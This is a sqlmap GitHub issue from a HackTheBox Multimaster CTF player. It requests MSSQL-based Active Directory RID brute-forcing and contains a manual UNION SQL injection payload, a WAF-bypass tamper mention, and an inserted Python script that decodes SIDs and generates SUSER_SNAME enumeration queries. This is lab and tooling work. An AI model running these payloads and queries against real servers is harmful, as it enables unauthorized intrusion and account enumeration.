sqlmap
MSSQL RID Bruteforce
Is your feature request related to a problem? Please describe. Yes, my feature request is related to a problem. While trying to get the SID for an Active Directory environment from a 2017 Microsoft SQL server, I was getting output that looked like this:
[02:48:21] [INFO] fetching SQL SELECT statement query output: 'SELECT SUSER_SID('MEGACORP\DOMAIN ADMINS')'
SELECT SUSER_SID('MEGACORP\DOMAIN ADMINS'): 'ԁ\\u0000\\u0000Ԁ\\u0015\\u0000\\u001c병臑䧱�㛂Ȁ\\u0000'
If I use the hex flag, it looks like this:
[08:40:26] [INFO] fetching SQL SELECT statement query output: 'SELECT SUSER_SID('MEGACORP\DOMAIN ADMINS')'
SELECT SUSER_SID('MEGACORP\DOMAIN ADMINS'): '\x01\x05\x00\x00\x00\x00\x00\x05\x15\x00\x00\x00\x1c\x00Ѽс\xf1I+\xdf\xc26\x00\x02\x00\x00'
I haven't had any luck at trying to decode this to the proper format. The SID is ... 0x0105000000000005150000001C00D1BCD181F1492BDFC236 and I got this because someone leaked it online. I was using the tamper charunicodeencode to bypass the WAF.
Describe the solution you'd like Implement a method of retrieving the SID from a MSSQL server, and brute-force users' RIDs to discover the usernames of users in AD.
Describe alternatives you've considered I've tried this ... https://github.com/Keramas/mssqli-duet ... but this wasn't working for me. Had to edit a lot of the code and still couldn't get it to work.
Additional context In case you want to test out your implementation of this feature, this is from the HackTheBox CTF Multimaster.
Maybe this should be a bug report instead... I was able to manually execute this query,
-' union select 1,2,3,4,(select (select stuff(upper(sys.fn_varbintohexstr((SELECT SUSER_SID('MEGACORP\Domain Admins')))), 1, 2, '')))-- -
but if I try with SQLMAP, it says...
[09:03:03] [WARNING] execution of non-query SQL statements is only available when stacked queries are supported
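Added example (not part of the issue, and not sqlmap's or mssqli-duet's code): the SID value in the --hex output above is recoverable as-is, because sqlmap only re-decoded the byte pairs D1 BC and D1 81 as the UTF-8 characters U+047C ("Ѽ") and U+0441 ("с") and left every other byte as \xNN or a printable ASCII character. The script below rebuilds the raw bytes from that output, decodes the SID into its S-1-5-21-... form, strips the RID to get the domain SID, and generates the SUSER_SNAME() lookups a RID brute-force would send. The sample value is the Domain Admins SID from the issue; the RID range and the query helper are illustrative assumptions.

```python
import struct

# Constructed sample input: the value sqlmap printed for
# SELECT SUSER_SID('MEGACORP\DOMAIN ADMINS') with --hex, copied from the issue.
# sqlmap decoded the byte pairs D1 BC and D1 81 as the UTF-8 characters
# U+047C and U+0441; every other byte appears as \xNN or as printable ASCII.
SQLMAP_OUTPUT = (
    "\x01\x05\x00\x00\x00\x00\x00\x05\x15\x00\x00\x00\x1c\x00"
    "\u047c\u0441\xf1I+\xdf\xc26\x00\x02\x00\x00"
)

# The same SID as raw bytes (the 24-byte hex quoted in the issue plus the
# little-endian RID 512 = 00 02 00 00 that the --hex output ends with).
DOMAIN_ADMINS_SID = bytes.fromhex(
    "0105000000000005150000001C00D1BCD181F1492BDFC23600020000"
)


def bytes_from_sqlmap_text(text: str) -> bytes:
    """Undo sqlmap's partial UTF-8 decoding of a varbinary value.

    Code points below 0x100 are single bytes that sqlmap escaped or printed as
    ASCII; anything higher is a multi-byte sequence it decoded as UTF-8, so it
    is re-encoded to recover the original bytes.
    """
    out = bytearray()
    for ch in text:
        cp = ord(ch)
        if cp < 0x100:
            out.append(cp)
        else:
            out += ch.encode("utf-8")
    return bytes(out)


def sid_to_string(raw: bytes) -> str:
    """Decode a binary SID: revision, sub-authority count, 48-bit big-endian
    identifier authority, then count little-endian 32-bit sub-authorities."""
    if len(raw) < 8:
        raise ValueError("SID needs at least 8 bytes")
    revision, count = raw[0], raw[1]
    authority = int.from_bytes(raw[2:8], "big")
    if len(raw) != 8 + 4 * count:
        raise ValueError(
            f"sub-authority count {count} implies {8 + 4 * count} bytes, got {len(raw)}"
        )
    subs = struct.unpack(f"<{count}I", raw[8:])
    return "S-{}-{}-{}".format(revision, authority, "-".join(map(str, subs)))


def string_to_sid(text: str) -> bytes:
    """Inverse of sid_to_string: build the binary SID that MSSQL expects."""
    parts = text.split("-")
    if len(parts) < 3 or parts[0] != "S":
        raise ValueError(f"not a SID string: {text!r}")
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    return (
        bytes([revision, len(subs)])
        + authority.to_bytes(6, "big")
        + struct.pack(f"<{len(subs)}I", *subs)
    )


def domain_sid(raw: bytes) -> str:
    """Drop the trailing RID of a domain account SID to get the domain SID."""
    return sid_to_string(raw).rsplit("-", 1)[0]


def rid_lookup_query(domain: str, rid: int) -> str:
    """T-SQL that resolves one RID to an account name (NULL if the RID is unused).

    SUSER_SNAME() takes the binary SID, so the domain SID plus RID is passed as
    a hex literal and no string-to-SID conversion is needed on the server.
    """
    sid_hex = string_to_sid(f"{domain}-{rid}").hex().upper()
    return f"SELECT SUSER_SNAME(0x{sid_hex})"


def rid_bruteforce_queries(domain: str, start: int = 500, stop: int = 1100):
    """Yield (rid, query) pairs. Assumed range: 500 is Administrator, 512 is
    Domain Admins, and RIDs from 1000 up are objects created after install."""
    for rid in range(start, stop):
        yield rid, rid_lookup_query(domain, rid)


if __name__ == "__main__":
    raw = bytes_from_sqlmap_text(SQLMAP_OUTPUT)
    assert raw == DOMAIN_ADMINS_SID
    print(sid_to_string(raw))
    for rid, query in rid_bruteforce_queries(domain_sid(raw), 500, 503):
        print(rid, query)
```

The 24-byte hex quoted in the issue is this 28-byte value minus its last four bytes: the count byte is already 5 while only four sub-authorities are present, so it is the domain SID prepared to receive a RID rather than a well-formed SID on its own (a strict parser like sid_to_string rejects it). Appending any RID as four little-endian bytes completes it, which is exactly what rid_lookup_query does before wrapping it in SUSER_SNAME(). Each generated SELECT is a non-stacked query that sqlmap can run through --sql-query once the bug in the reply below is fixed, or that can be pasted into the manual UNION payload shown above.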

With the latest revision, the query bug should be fixed. Nevertheless, I have a feeling that something else will come up.